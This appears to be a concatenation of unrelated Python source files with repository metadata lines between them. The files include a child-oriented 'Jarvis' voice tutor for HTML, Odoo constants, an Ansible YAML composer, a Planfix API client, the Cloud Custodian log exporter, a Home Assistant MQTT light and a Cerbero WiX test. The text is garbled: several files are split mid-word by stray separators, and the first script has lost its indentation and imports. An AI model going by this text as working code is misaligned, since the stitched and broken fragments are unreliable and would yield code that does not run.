import glob # GRAPHICAL USER INTERfACE using 'Tkinter' immitating "DORA THE ExPLORER"
import time
##CONFIGURE THIS SECTION TO INDIAN LANGUAGES
# set property to voice engine
import pyttsx
engine = pyttsx.init('sapi5') #USE espeak IN LINUX
engine.setProperty('voice', 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_EN-US_ZIRA_11.0')
engine.setProperty('rate', 130)
# speak function
def speak(text):
engine.say(text)
engine.runAndWait()
doss = os.getcwd()
i=0
n=0
flag=0
FACE = '''
+=======================================+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+---------------------------------------+
|#Author: ALienTrix |
|#Date: 01/06/2016 |
___
( )
.-.| | .--. ___ .-. .---.
/ \ | / \ ( ) \ / .-, \
| .-. | | .-. ; | ' .-. ; (__) ; |
| | | | | | | | | / (___) .'` |
| | | | | | | | | | / .'| |
| | | | | | | | | | | / | |
| ' | | | ' | | | | ; | ; |
' `-' / ' `-' / | | ' `-' |
`.__,' `.__.' (___) `.__.'_.
| |
+---------------------------------------+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+=======================================+
| |
+=======================================+
'''
print(FACE)
while (i<1):
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.adjust_for_ambient_noise(source)
speak("Listening..")
print("|-('')-|") #START TALKING ONLY AFTER THIS PRINTS ON THE SCREEN
audio = r.listen(source)
try:
s = (r.recognize_google(audio)) #I used google gTTS as its the best Online recognizer, you can use CMU-SPHINX for OFFLINE
message = (s.lower())
print (message)
# PROFESSOR JARVIS ========================================================================================================== TRAINING MODULE
if("teach me web") in message:
rand = ['Oh My Goodness! You are only 5 years old! and you wanna know HTML?']
speak(rand)
speak("Okay, So HTML Stands for Hyper Text Markup Language! But lets not worry about this big word")
speak("Now I'll do something for you, but lets first you cute little thing tell me whats your name ?")
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.adjust_for_ambient_noise(source)
#speak("Listening..")
print(">>>")
audio = r.listen(source)
s = (r.recognize_google(audio))
message = (s.lower())
name=message
print (name)
speak('Oukay'+message+', So pretty name you have!')
speak("Now Lets check this Cool thing I'm opening here...")
Chrome = ("C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
# B102 HARDWARE INTERRUPT NEEDED, CLOSE CHROME MANUALLY
#time.sleep(10)
#os.system('taskkill /im chrome.exe /f')
speak("Do you see your name there? What? No?")
print("10 sec up")
os.system('atom KeepCalm.html')
#subprocess.call(['notepad.exe','KeepCalm.html'])
# To be done: Selenium Time Controlled Web Browser Monitor
speak("Okay I am Opening something where you'll see some bla bla texts..")
speak("You see it?")
time.sleep(10)
print("10 sec up")
#HEADER
speak("Look theres written Dora the explorer there, lets change it your name. You know you have a good cool name. Lets write it down here.")
#os.system("notepad.exe keepcalm.html")
#os.system('atom KeepCalm.html')
time.sleep(10)
print("10 sec up")
speak("Now lets check the page with the Ugly naked guy again!")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("can you see your name there now?")
speak("You see it? Great!!")
speak("You know its called a Header in html, grown ups write some
|
big texts her
|
e!")
#IMAGE IMPORT IN HTML
speak("Oho! Everything is great but you don't have to be naked for that. Lets dress up, shall we?")
speak("Now lets again check that stupid file with lots of bla bla texts in it")
os.system('atom KeepCalm.html')
speak("Do you see NAKED Guy written on somewhere? Can you see it? You found it? Yaaai!!")
speak("Now lets change it to DRESSED Guy")
speak("Now lets check the browser again")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("Yep! this looks better! You are a Smart kid!")
speak("Now what you just did is how we change pictures in HTML")
#STYLING IN HTML
speak("Well since we are actually doing many cool stuffs! so that 'Keep calm and Do Nothing' phrase is little awkward. don't you think so?")
speak("Now lets change it like you changed your name, Come on you can do it, I'm opening the same thing for you, its called an Editor, here you can write html codes")
os.system('atom KeepCalm.html')
speak("Now lets change the text to Keep calm and do Coding")
time.sleep(10)
print("10 sec up")
speak("you did it, cool")
speak("This portion of the code is called the Body you know! Body of the code!")
speak("Now lets make the fonts look little bit bigger")
speak("can you see there written font size?")
speak("Change the value next to the font size 160 to 200 now")
webbrowser.get(Chrome).open('KeepCalm.html')
speak("You done it? Good Work!")
speak("This thing just you did is called Styling. You know every cool kid likes fashion, our html too is cool. he likes styles. and it is called CSS")
#FURTHER DEVELOPMENT GOES BELOW HERE INSIDE THE LOOP
# exceptions
except sr.UnknownValueError:
print("$could not understand audio")
speak("Pardon sir, can you please repeat?")
except sr.RequestError as e:
print("Could not request results$; {0}".format(e))
|
odoo-brazil/l10n-brazil-wip
|
l10n_br_financial/constantes.py
|
Python
|
agpl-3.0
| 388
| 0
|
# -*- coding: utf-8 -*-
# Copyright 2017 KMEE
# License AGPL-3.0 or later (h
|
ttp://www.gnu.org/licenses/agpl).
from __future__ import division, print_function, unicode_literals
TIPO_COBRANCA = (
('0', u'Carteira'),
('1', u'Cheque'),
('2', u'CNAB'),
)
TIPO_COBRANCA_SPED = (
('0', u'Duplicata'),
('1', u'Cheque'),
('2', u'Promissória'),
('3', u'Rec
|
ibo'),
)
|
gitterHQ/ansible
|
v2/ansible/parsing/yaml/composer.py
|
Python
|
gpl-3.0
| 1,212
| 0.00495
|
from yaml.composer import Composer
from yaml.nodes import MappingNode
class AnsibleComposer(Composer):
def __init__(self):
self.__mapping_starts = []
super(Composer, self).__init__()
def compose_node(self, parent, index):
# the line number where the previous token has ended (plus empty lines)
node = Composer.compose_node(self, parent, index)
if isinstance(node, MappingNode):
node.__datasource__ = self.name
try:
(cur_line, cur_column) = self.__mapping_starts.pop()
except:
cur_line = None
cur_column = None
node.__line__ = cur_line
node.__column__ = cur_column
retu
|
rn node
def compose_mapping_node(self, anchor):
# the column here will point at the position in the file immediately
# after the first key is found, which could be a space or a newline.
# We could back this up to find the beginning of the key, but this
# should be good enough to determine the error location.
self.__mapping_starts.append((self.line + 1, self.column
|
+ 1))
return Composer.compose_mapping_node(self, anchor)
|
westernx/sgfs
|
sgfs/commands/rv.py
|
Python
|
bsd-3-clause
| 2,458
| 0.004475
|
import os
from subprocess import call, Popen, PIPE
import sys
from . import Command
from . import utils
class OpenSequenceInRV(Command):
"""%prog [options] [paths]
Open the latest version for each given entity.
"""
def run(self, sgfs, opts, args):
# Parse them all.
arg_to_movie = {}
arg_to_entity = {}
for arg in args:
if os.path.exists(arg):
arg_to_movie[arg] = arg
continue
print 'Parsing %r...' % arg
data = utils.parse_spec(sgfs, arg.split(), ['Shot'])
type_ = data.get('type')
id_ = data.get('id')
if not (type_ or id_):
print 'no entities found for', repr(arg)
return 1
arg_to_entity.setdefault(type_, {})[arg] = sgfs.session.merge(dict(type=type_, id=id_))
tasks = arg_to_entity.pop('Task', {})
shots = arg_to_entity.pop('Shot', {})
if arg_to_entity:
print 'found entities that were not Task or Shot:', ', '.join(sorted(arg_to_entity))
return 2
if tasks:
print 'Getting shots from tasks...'
sgfs.session.fetch(tasks.values(), 'entity')
for arg, task in tasks.iteritems():
shots[arg] = task['entity']
if shots:
print 'Getting versions from shots...'
sgfs.session.fetch(shots.values(), ('sg_latest_version.Version.sg_path_to_movie', 'sg_latest_version.Version.sg_path_to_frames'))
for arg, shot in shots.iteritems():
version = shot.get('sg_latest_version')
if not version:
print 'no version for', shot
return 3
path = version.get('sg_path_to_movie') or version.get('sg_path_to_frames')
if not path:
print 'no movie or frames for', version
return 4
arg_to_movie[a
|
rg] = path
movies = [arg_to_movie[arg] for arg in args]
print 'Opening:'
print '\t' + '\n\t'.join(movies)
rvlink = Popen(['rv', '-bakeURL'] + movies, stderr=PIPE).communicate()[1].strip().split()[-1]
self.open(rvlink)
|
def open(self, x):
if sys.platform.startswith('darwin'):
call(['open', x])
else:
call(['xdg-open', x])
run = OpenSequenceInRV()
|
chadoneba/django-planfix
|
planfix/classes.py
|
Python
|
apache-2.0
| 6,136
| 0.009452
|
import requests
from hashlib import md5
from xml.etree import ElementTree
from django.core.cache import cache
from functools import cmp_to_key
# class Cache(object):
# params = {}
#
# def get(self,key):
# if key in self.params:
# return self.params[key]
# else:
# return None
#
# def set(self,key,value,timeout):
# self.params[key] = value
#
#
# cache = Cache()
class PlanFixBase(object):
CACHE_TIMELIFE = 20
request_templ = """<?xml version="1.0" encoding="UTF-8"?>
<request method="{}">
{}
<signature>{}</signature>
</request>
"""
name = ''
scheme = []
sign = ''
host = ""
api_key = ""
private_key = ""
project_id = ""
user = ""
password = ""
account = ""
level = 0
sid = None
debug = None
def __init__(self,*args,**kwargs):
self.sid = cache.get('planfix_sid')
attr_list = [i.__str__() for i in dir(self) if not i.startswith('__')]
if kwargs:
for item in kwargs.keys():
if item in attr_list:
self.__setattr__(item,kwargs[item])
if not self.sid:
self.auth()
def scheme_sort(self,a,b):
tmp_a = a.keys()[0] if isinstance(a,dict) else a
tmp_b = b.keys()[0] if isinstance(b,dict) else b
if tmp_a == tmp_b: return 0
if tmp_a > tmp_b:
return 1
else:
return -1
def get_sign(self,**kwargs):
params_list = self.name + self.string_by_schemefileds(self.scheme,**kwargs) + self.private_key
self.sign = md5(params_list.encode('utf-8')).hexdigest()
def string_by_schemefileds(self,element,**kwargs):
result_list = []
element = list(element)
sorted(element,key=cmp_to_key(self.scheme_sort))
for item in element:
if not isinstance(item, dict):
tmp_item = self.get_value(item,)
result_list.append(self.get_value(item, **kwargs))
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
result_list.append(self.get_value(tmp_key,
|
**kwargs))
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res, list):
result_list.append("".join(["".join([str(i[0]),str(i[1])]) for i in res]))
else:
|
result_list.append(self.get_value(tmp_val, **kwargs))
else:
result_list.append(self.string_by_schemefileds(tmp_val, **kwargs))
return "".join(result_list)
def get_value(self,value, **kwargs):
if value in kwargs:
return kwargs.get(value)
return ''
def create_xml_by_scheme(self,element, **kwargs):
result = ""
template = "<%s>%s</%s>"
custom_data_template = "<id>%s</id><value>%s</value>"
for item in element:
if not isinstance(item, dict):
result += template % (item, self.get_value(item, **kwargs), item)
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res,list):
sub_result = "".join([template % (tmp_val,(custom_data_template % i),tmp_val) for i in res])
else:
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
else:
sub_result = self.create_xml_by_scheme(tmp_val, **kwargs)
result += template % (tmp_key, sub_result, tmp_key)
return result
def connect(self,**kwargs):
if not 'sid' in kwargs and self.sid:
kwargs['sid'] = self.sid
self.get_sign(**kwargs)
body = self.create_xml_by_scheme(self.scheme, **kwargs)
self.print_debug(body)
data = self.request_templ.format(self.name,body.encode('utf-8'),self.sign)
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
if self.name != 'auth.login':
if self.is_session_valid(r.content):
self.print_debug(r.content)
return r.content
else:
tmp_params = dict(name=self.name,scheme=self.scheme)
self.auth(renew=True)
self.scheme,self.name = tmp_params['scheme'],tmp_params['name']
return self.connect(**kwargs)
else:
return r.content
def is_session_valid(self,res):
response = ElementTree.fromstring(res)
if response.attrib['status'] == 'ok':
return True
else:
if response.find('code').text == '0005':
return False
else:
raise AttributeError(response.find('code').text)
def auth(self,renew=False):
if renew or self.sid == None:
self.name = 'auth.login'
self.scheme = \
[ 'account'
, 'login'
, 'password'
]
params = \
{ 'account':self.account
, 'login':self.user
, 'password':self.password
}
response = ElementTree.fromstring(self.connect(**params))
res = response.find('sid')
self.sid = res.text
cache.set('planfix_sid',self.sid,self.CACHE_TIMELIFE*60)
def print_debug(self,msg):
if hasattr(self.debug,'__call__'):
try:
self.debug(msg)
except TypeError as e:
print(e)
|
oknalv/piollo
|
loggersingleton.py
|
Python
|
gpl-2.0
| 1,004
| 0.001992
|
class LoggerSingleton:
_instance = None
@staticmethod
def get_instance(console_log=False):
if LoggerSingleton._instance is None:
LoggerSingleton._instance = LoggerSingleton._Logger()
if console_log:
LoggerSingleton._instance.set_next(LoggerSingleton._ConsoleLogger())
return LoggerSingleton._instance
class _Logger(object):
def __init__(self):
self.next_logger = None
def log(self, message):
if self.next_logger is not None:
self.next_logger.log(message)
def set_next(self, next):
if self.next_logger is not None:
self.next_logger.set_next(next)
else:
self.next_logger = next
class _ConsoleLogger(_Logger):
def __init__(self):
LoggerSinglet
|
on._Logger.__init__(self)
def log(self, message):
print message
LoggerSingleton._Logg
|
er.log(self, message)
|
ogazitt/stackalytics
|
tests/unit/test_mps.py
|
Python
|
apache-2.0
| 1,964
| 0
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import testtools
from stackalytics.processor import mps
class TestMps(testtools.TestCase):
def setUp(self):
super(TestMps, self).setUp()
def test_member_parse_regex(self):
content = '''<h1>Individual Member Profile</h1>
<div class="candidate span-14">
<div class="span-4">
<img src="/themes/openstack/images/generic-profile-photo.png"><p> </p>
</div>
<a name="profile-10501"></a>
<div class="details span-10 last">
<div class="last name-and-title">
<h3>Jim Battenberg</h3>
</div>
<hr><div class="span-3"><strong>Date Joined</strong></div>
<div class="span-7 last">June 25, 2013 <br><br></div>
<div class="span-3"><strong>Affiliatio
|
ns</strong></div>
<div class="span-7 last">
<div>
|
<b>Rackspace</b> From (Current)
</div>
</div>
<div class="span-3"><strong>Statement of Interest </strong></div>
<div class="span-7 last">
<p>contribute logic and evangelize openstack</p>
</div>
<p> </p>'''
match = re.search(mps.NAME_AND_DATE_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Jim Battenberg', match.group('member_name'))
self.assertEqual('June 25, 2013 ', match.group('date_joined'))
match = re.search(mps.COMPANY_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Rackspace', match.group('company_draft'))
|
sixfeetup/cloud-custodian
|
tools/c7n_logexporter/c7n_logexporter/exporter.py
|
Python
|
apache-2.0
| 26,318
| 0.00057
|
# Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from botocore.exceptions import ClientError
import boto3
import click
import json
from c7n.credentials import assumed_session
from c7n.utils import get_retry, dumps, chunks
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime, timedelta
from dateutil.tz import tzutc, tzlocal
from dateutil.parser import parse
import fnmatch
import functools
import jsonschema
import logging
import time
import os
import operator
from tabulate import tabulate
import yaml
from c7n.executor import MainThreadExecutor
MainThreadExecutor.async = False
logging.basicC
|
onfig(level=logging.INFO)
logging.getLogger('c7n.worker').setLevel(logging.DEBUG)
logging.getLogger('botocore').setLevel(logging.WARNING)
log = logging.getLogger('c7n-log-exporter')
CONFIG_SCHEMA = {
'$schema': 'http://json-schema.org/schema#',
|
'id': 'http://schema.cloudcustodian.io/v0/logexporter.json',
'definitions': {
'destination': {
'type': 'object',
'additionalProperties': False,
'required': ['bucket'],
'properties': {
'bucket': {'type': 'string'},
'prefix': {'type': 'string'},
},
},
'account': {
'type': 'object',
'additionalProperties': False,
'required': ['role', 'groups'],
'properties': {
'name': {'type': 'string'},
'role': {'oneOf': [
{'type': 'array', 'items': {'type': 'string'}},
{'type': 'string'}]},
'groups': {
'type': 'array', 'items': {'type': 'string'}
}
}
}
},
'type': 'object',
'additionalProperties': False,
'required': ['accounts', 'destination'],
'properties': {
'accounts': {
'type': 'array',
'items': {'$ref': '#/definitions/account'}
},
'destination': {'$ref': '#/definitions/destination'}
}
}
def debug(func):
@functools.wraps(func)
def run(*args, **kw):
try:
return func(*args, **kw)
except SystemExit:
raise
except Exception:
import traceback
import pdb
import sys
traceback.print_exc()
pdb.post_mortem(sys.exc_info()[-1])
raise
return run
@click.group()
def cli():
"""c7n cloudwatch log group exporter"""
@cli.command()
@click.option('--config', type=click.Path())
def validate(config):
"""validate config file"""
with open(config) as fh:
content = fh.read()
try:
data = yaml.safe_load(content)
except Exception:
log.error("config file: %s is not valid yaml", config)
raise
try:
jsonschema.validate(data, CONFIG_SCHEMA)
except Exception:
log.error("config file: %s is not valid", config)
raise
log.info("config file valid, accounts:%d", len(data['accounts']))
return data
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('--start', required=True)
@click.option('--end')
@click.option('-a', '--accounts', multiple=True)
@click.option('--debug', is_flag=True, default=False)
def run(config, start, end, accounts):
"""run export across accounts and log groups specified in config."""
config = validate.callback(config)
destination = config.get('destination')
start = start and parse(start) or start
end = end and parse(end) or datetime.now()
executor = debug and MainThreadExecutor or ThreadPoolExecutor
with executor(max_workers=32) as w:
futures = {}
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
futures[
w.submit(process_account, account, start, end, destination)] = account
for f in as_completed(futures):
account = futures[f]
if f.exception():
log.error("Error on account %s err: %s",
account['name'], f.exception())
log.info("Completed %s", account['name'])
def lambdafan(func):
"""simple decorator that will auto fan out async style in lambda.
outside of lambda, this will invoke synchrously.
"""
if 'AWS_LAMBDA_FUNCTION_NAME' not in os.environ:
return func
@functools.wraps(func)
def scaleout(*args, **kw):
client = boto3.client('lambda')
client.invoke(
FunctionName=os.environ['AWS_LAMBDA_FUNCTION_NAME'],
InvocationType='Event',
Payload=dumps({
'event': 'fanout',
'function': func.__name__,
'args': args,
'kwargs': kw}),
Qualifier=os.environ['AWS_LAMBDA_FUNCTION_VERSION'])
return scaleout
@lambdafan
def process_account(account, start, end, destination, incremental=True):
session = get_session(account['role'])
client = session.client('logs')
paginator = client.get_paginator('describe_log_groups')
all_groups = []
for p in paginator.paginate():
all_groups.extend([g for g in p.get('logGroups', ())])
group_count = len(all_groups)
groups = filter_creation_date(
filter_group_names(all_groups, account['groups']),
start, end)
if incremental:
groups = filter_last_write(client, groups, start)
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
log.info("account:%s matched %d groups of %d",
account.get('name', account_id), len(groups), group_count)
if not groups:
log.warning("account:%s no groups matched, all groups \n %s",
account.get('name', account_id), "\n ".join(
[g['logGroupName'] for g in all_groups]))
t = time.time()
for g in groups:
export.callback(
g,
destination['bucket'], prefix,
g['exportStart'], end, account['role'],
name=account['name'])
log.info("account:%s exported %d log groups in time:%0.2f",
account.get('name') or account_id,
len(groups), time.time() - t)
def get_session(role, session_name="c7n-log-exporter", session=None):
if role == 'self':
session = boto3.Session()
elif isinstance(role, basestring):
session = assumed_session(role, session_name)
elif isinstance(role, list):
session = None
for r in role:
session = assumed_session(r, session_name, session=session)
else:
session = boto3.Session()
return session
def filter_group_names(groups, patterns):
"""Filter log groups by shell patterns.
"""
group_names = [g['logGroupName'] for g in groups]
matched = set()
for p in patterns:
matched.update(fnmatch.filter(group_names, p))
return [g for g in groups if g['logGroupName'] in matched]
def filter_creation_date(groups, start, end):
"""Filter log groups by their creation date.
Also sets group specific value for start to the minimum
of creation date or start.
"""
results = []
for g in groups:
created = datetime.fromtimestamp(g['creationTime'] / 1000.0)
if created > end:
continue
if created > start:
g['exportStart'] = created
else:
g['exportStart'] = start
results.append(g)
return re
|
tinloaf/home-assistant
|
homeassistant/components/light/mqtt/schema_template.py
|
Python
|
apache-2.0
| 16,276
| 0
|
"""
Support for MQTT Template lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.mqtt_template/
"""
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components import mqtt
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_EFFECT, ATTR_FLASH,
ATTR_HS_COLOR, ATTR_TRANSITION, ATTR_WHITE_VALUE, Light,
SUPPORT_BRIGHTNESS, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_FLASH,
SUPPORT_COLOR, SUPPORT_TRANSITION, SUPPORT_WHITE_VALUE)
from homeassistant.const import (
CONF_DEVICE, CONF_NAME, CONF_OPTIMISTIC, STATE_ON, STATE_OFF)
from homeassistant.components.mqtt import (
CONF_AVAILABILITY_TOPIC, CONF_STATE_TOPIC, CONF_COMMAND_TOPIC,
CONF_PAYLOAD_AVAILABLE, CONF_PAYLOAD_NOT_AVAILABLE, CONF_QOS, CONF_RETAIN,
MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo, subscription)
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
from homeassistant.helpers.restore_state import RestoreEntity
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'mqtt_template'
DEPENDENCIES = ['mqtt']
DEFAULT_NAME = 'MQTT Template Light'
DEFAULT_OPTIMISTIC = False
CONF_BLUE_TEMPLATE = 'blue_template'
CONF_BRIGHTNESS_TEMPLATE = 'brightness_template'
CONF_COLOR_TEMP_TEMPLATE = 'color_temp_template'
CONF_COMMAND_OFF_TEMPLATE = 'command_off_template'
CONF_COMMAND_ON_TEMPLATE = 'command_on_template'
CONF_EFFECT_LIST = 'effect_list'
CONF_EFFECT_TEMPLATE = 'effect_template'
CONF_GREEN_TEMPLATE = 'green_template'
CONF_RED_TEMPLATE = 'red_template'
CONF_STATE_TEMPLATE = 'state_template'
CONF_WHITE_VALUE_TEMPLATE = 'white_value_template'
CONF_UNIQUE_ID = 'unique_id'
PLATFORM_SCHEMA_TEMPLATE = mqtt.MQTT_RW_PLATFORM_SCHEMA.extend({
vol.Optional(CONF_BLUE_TEMPLATE): cv.template,
vol.Optional(CONF_BRIGHTNESS_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_TEMPLATE): cv.template,
vol.Optional(CONF_EFFECT_LIST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_EFFECT_TEMPLATE): cv.template,
vol.Optional(CONF_GREEN_TEMPLATE): cv.template,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_RED_TEMPLATE): cv.template,
vol.Optional(CONF_RETAIN, default=mqtt.DEFAULT_RETAIN): cv.boolean,
vol.Optional(CONF_STATE_TEMPLATE): cv.template,
vol.Optional(CONF_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_WHITE_VALUE_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_OFF_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_ON_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_QOS, default=mqtt.DEFAULT_QOS):
vol.All(vol.Coerce(int), vol.In([0, 1, 2])),
vol.Optional(CONF_UNIQUE_ID): cv.string,
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
}).extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
async def async_setup_entity_template(hass, config, async_add_entities,
discovery_hash):
"""Set up a MQTT Template light."""
async_add_entities([MqttTemplate(config, discovery_hash)])
# pylint: disable=too-many-ancestors
class MqttTemplate(MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo,
Light, RestoreEntity):
"""Representation of a MQTT Template light."""
def __init__(self, config, discovery_hash):
"""Initialize a MQTT Template light."""
self._state = False
self._sub_state = None
self._topics = None
self._templates = None
self._optimistic = False
# features
self._brightness = None
self._color_temp = None
self._white_value = None
self._hs = None
self._effect = None
self._unique_id = config.get(CONF_UNIQUE_ID)
# Load config
self._setup_from_config(config)
availability_topic = config.get(CONF_AVAILABILITY_TOPIC)
payload_available = config.get(CONF_PAYLOAD_AVAILABLE)
payload_not_available = config.get(CONF_PAYLOAD_NOT_AVAILABLE)
qos = config.get(CONF_QOS)
device_config = config.get(CONF_DEVICE)
MqttAvailability.__init__(self, availability_topic, qos,
payload_available, payload_not_available)
MqttDiscoveryUpdate.__init__(self, discovery_hash,
self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA_TEMPLATE(discovery_payload)
self._setup_from_config(config)
await self.availability_discovery_update(config)
await self._subscribe_topics()
self.async_schedule_update_ha_state()
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
self._config = config
self._topics = {
key: config.get(key) for key in (
CONF_STATE_TOPIC,
CONF_COMMAND_TOPIC
)
}
self._templates = {
key: config.get(key) for key in (
CONF_BLUE_TEMPLATE,
CONF_BRIGHTNESS_TEMPLATE,
CONF_COLOR_TEMP_TEMPLATE,
CONF_COMMAND_OFF_TEMPLATE,
CONF_COMMAND_ON_TEMPLATE,
CONF_EFFECT_TEMPLATE,
CONF_GREEN_TEMPLATE,
CONF_RED_TEMPLATE,
CONF_STATE_TEMPLATE,
CONF_WHITE_VALUE_TEMPLATE,
)
}
optimistic = config.get(CONF_OPTIMISTIC)
self._optimistic = optimistic \
or self._topics[CONF_STATE_TOPIC] is None \
or self._templates[CONF_STATE_TEMPLATE] is None
# features
if self._templates[CONF_BRIGHTNESS_TEMPLATE] is not None:
self._brightness = 255
else:
self._brightness = None
if self._templates[CONF_COLOR_TEMP_TEMPLATE] is not None:
self._color_temp = 255
else:
self._color_temp = None
if self._templates[CONF_WHITE_VALUE_TEMPLATE] is not None:
self._white_value = 255
else:
self._white_value = None
if (self._templates[CONF_RED_TEMPLATE] is not None and
self._templat
|
es[CONF_GREEN_TEMPLATE] is not None and
self._templates[CONF_BLUE_TEMPLATE] is not None):
se
|
lf._hs = [0, 0]
else:
self._hs = None
self._effect = None
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
for tpl in self._templates.values():
if tpl is not None:
tpl.hass = self.hass
last_state = await self.async_get_last_state()
@callback
def state_received(topic, payload, qos):
"""Handle new MQTT messages."""
state = self._templates[CONF_STATE_TEMPLATE].\
async_render_with_possible_json_value(payload)
if state == STATE_ON:
self._state = True
elif state == STATE_OFF:
self._state = False
else:
_LOGGER.warning("Invalid state value received")
if self._brightness is not None:
try:
self._brightness = int(
self._templates[CONF_BRIGHTNESS_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning("Invalid brightness value received")
if self._color_temp is not None:
try:
self._color_temp = int(
self._templates[CONF_COLOR_TEMP_TE
|
cee1/cerbero-mac
|
test/test_cerbero_packages_wix.py
|
Python
|
lgpl-2.1
| 8,020
| 0.006733
|
# cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import unittest
import StringIO
from cerbero import hacks
from cerbero.build import recipe
from cerbero.config import Platform
from cerbero.packages import package
from cerbero.packages.wix import MergeModule
from cerbero.utils import etree
from test.test_build_common import create_cookbook
from test.test_packages_common import create_store
from test.test_common import DummyConfig
class Recipe1(recipe.Recipe):
name = 'recipe-test'
files_misc = ['bin/test.exe', 'bin/test2.exe', 'bin/test3.exe',
'README', 'lib/libfoo.dll', 'lib/gstreamer-0.10/libgstplugins.dll']
class Package(package.Package):
name = 'gstreamer-test'
shortdesc = 'GStreamer Test'
longdesc = 'test'
version = '1.0'
licences = ['LGPL']
uuid = '1'
vendor = 'GStreamer Project'
files = ['recipe-test:misc']
MERGE_MODULE = '''\
<?xml version="1.0" ?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Module Id="_gstreamer_test" Language="1033" Version="1.0">
<Package Comments="test" Description="GStreamer Test" Id="1" Manufacturer="GStreamer Project"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Component Guid="1" Id="_readme">
<File Id="_readme_1" Name="README" Source="z:\\\\\\test\\\\README"/>
</Component>
<Directory Id="_bin" Name="bin">
<Component Guid="1" Id="_test.exe">
<File Id="_testexe" Name="test
|
.exe" Source="z:\\\\\\test\\\\bin\\\\test.exe"/>
</Component>
<Component Guid="1" Id="_test2
|
.exe">
<File Id="_test2exe" Name="test2.exe" Source="z:\\\\\\test\\\\bin\\\\test2.exe"/>
</Component>
<Component Guid="1" Id="_test3.exe">
<File Id="_test3exe" Name="test3.exe" Source="z:\\\\\\test\\\\bin\\\\test3.exe"/>
</Component>
</Directory>
<Directory Id="_lib" Name="lib">
<Directory Id="_gstreamer_0.10" Name="gstreamer-0.10">
<Component Guid="1" Id="_libgstplugins.dll">
